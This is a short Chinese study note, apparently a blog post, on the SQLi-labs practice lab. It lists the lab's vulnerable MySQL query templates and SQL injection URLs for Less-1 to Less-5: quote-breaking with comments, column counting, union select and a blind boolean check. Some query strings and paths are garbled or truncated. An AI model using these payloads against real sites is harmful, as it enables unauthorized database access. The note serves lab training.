sqli labs 1

sqli lbas 1 数据库是mysql

sql 查询语句 :
sql="SELECTFROMusersWHEREid=id’ LIMIT 0,1”;

在index.php?id=,构造可能的sql语句,通过判断是否存在sql注入

sql语句 中的注释: – (注意要空格%20 或者是在后面写+)
1. /index.php?id=2%27%20or%201=1%20–+ 存在注入
2. sqli-labs-master/Less-1/?id=1’ order by 3 –+ 3列

======================================
sqli labs中的查询语句
1 “SELECT * FROM users WHERE id= ‘idLIMIT0,1;2.SELECTFROMusersWHEREid=id LIMIT 0,1”;
3. “SELECT * FROM users WHERE id=(‘$id’) LIMIT 0,1”;
方法:s-master/Less-3/?id=-2’) union select 1,2,3 –+

  1. SELECT * FROM users WHERE id=($id) LIMIT 0,1
    报错:li-labs-master/Less-4/index.php?id=1”
    方法:id=0”) union select 1,2,3–+

  2. SELECT * FROM users WHERE id=’$id’ LIMIT 0,1
    盲注:(不会报错)
    报错:labs-master/Less-5/index.php?id=1’
    方法:p?id=-1’ and (select count(*) from users where id=1) >0 –+

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值